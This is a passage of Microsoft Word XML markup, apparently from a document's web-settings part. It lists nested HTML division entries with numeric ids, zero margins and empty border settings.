                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="184830125">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="126472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59037">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="180167589">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1043939853">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="901411051">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1381393243">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="10789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15299">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1508135503">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="171573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83543">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1371997595">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1372412464">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1373506382">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1375157368">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1375813916">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1375931286">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="67306568">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1376155490">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="917206821">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1713118890">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="859199656">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1767574390">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="177767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07602">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1828664267">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1444494760">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="46877767">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="667639815">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="212973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4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27723">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1377971780">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1420328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236458">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1378629930">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1494492081">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="42677977">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="731077088">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1293831435">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="125300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89173">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1095711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704093092">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1288700397">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1295454038">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1236475291">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="185769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45773">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1486625229">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="720"/>
          <w:marRight w:val="720"/>
          <w:marTop w:val="100"/>
          <w:marBottom w:val="100"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="505360387">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1150486298">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1601989979">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="975571808">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="187272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17282">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="2040354913">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="677856101">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1640529831">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="844129743">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="62589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86133">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="637688024">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="720"/>
          <w:marRight w:val="720"/>
          <w:marTop w:val="100"/>
          <w:marBottom w:val="100"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="801457177">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1910188065">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="312953085">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="390033766">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="40726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06572">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="307173116">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="195914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969945">
